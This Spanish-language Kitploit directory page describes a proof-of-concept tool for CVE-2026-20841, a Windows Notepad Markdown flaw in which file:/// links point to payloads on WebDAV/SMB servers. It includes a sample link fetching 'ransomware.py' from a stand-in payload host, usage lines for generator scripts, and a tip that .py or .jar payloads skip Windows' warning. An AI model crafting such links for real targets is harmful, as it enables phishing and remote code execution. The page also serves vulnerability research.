Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-20841 — PoC para el "Windows Notepad RCE" | Kitploit
Herramientas/GitHubGitHub/tangent65536/cve-2026-20841
Generación de PayloadsExplotaciónPhishing
GitHubtangent65536/cve-2026-20841

CVE-2026-20841

PoC para el "Windows Notepad RCE"

Ver Repositorio
21hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-20841 PoC

PoC de la vulnerabilidad "Windows Notepad RCE".

Descargos

  1. NO soy quien descubrió esta vulnerabilidad. Créditos para los autores originales que figuran en la página oficial de divulgación. Simplemente recreé el PoC según la descripción.
  2. Personalmente no creo que esta vulnerabilidad sea tan grave como podría parecer. Se necesita más de un clic para activarla, a menos que se cumplan ciertos criterios en el sistema objetivo. Consulta la sección Criterios y Limitaciones. Recreé este PoC porque es muy digno de memes. Un "Notepad RCE" suena a locura total.

Descripción

La "vulnerabilidad" es simple. El motor de Markdown del Bloc de notas de Windows no le presta atención a los protocolos URL poco conocidos. Como analista de malware, he leído muchos informes sobre el despliegue de payloads mediante WebDAV y SMB. A partir de este documento, se puede abusar del protocolo file:/// y crear una URL que apunte a un archivo en un servidor WebDAV/SMB.

root@kitploit:~
[BadLink](file:///\\webdav-payload-host@5005\DavWWWRoot\ransomware.py)

Uso

He creado dos scripts. Uno en Node.js y el otro en Python. Ambos crean un archivo Markdown que apunta a un payload WebDAV. Puedes usar los payloads de ejemplo que están en la carpeta sample-payloads.

Node.js

node poc.js <webdav-server> <port> <payload/path/on/server>

Python

python poc.py <webdav-server> <port> <payload/path/on/server>

El resultado (poc.md) aparecerá en el directorio actual.

Criterios y Limitaciones

  1. La mayoría de las extensiones de payload (p. ej., .exe, .lnk, .vbs, ...) seguirán activando un aviso integrado, aunque la aplicación Bloc de notas sea vulnerable. El aviso proviene del propio Windows. Al menos todo lo que he probado y que puede conducir a la ejecución de código en una instalación OOB predeterminada muestra este aviso obligatorio.
    fig01

  2. Si el dispositivo objetivo tiene Python o Java instalado, puedes usar un payload .py o .jar para omitir la advertencia emergente.

Después del Parche

fig02
Al hacer clic en el enlace ahora aparece una nueva advertencia emergente.

Varios

Puedes encontrar la versión vulnerable del Bloc de notas de Windows en Uptodown. Recuerda verificar la firma digital del instalador y asegúrate de que sea de Microsoft. Además, solo deberías probar este PoC en una VM.

¡Mantente a salvo y diviértete!

Descargar herramienta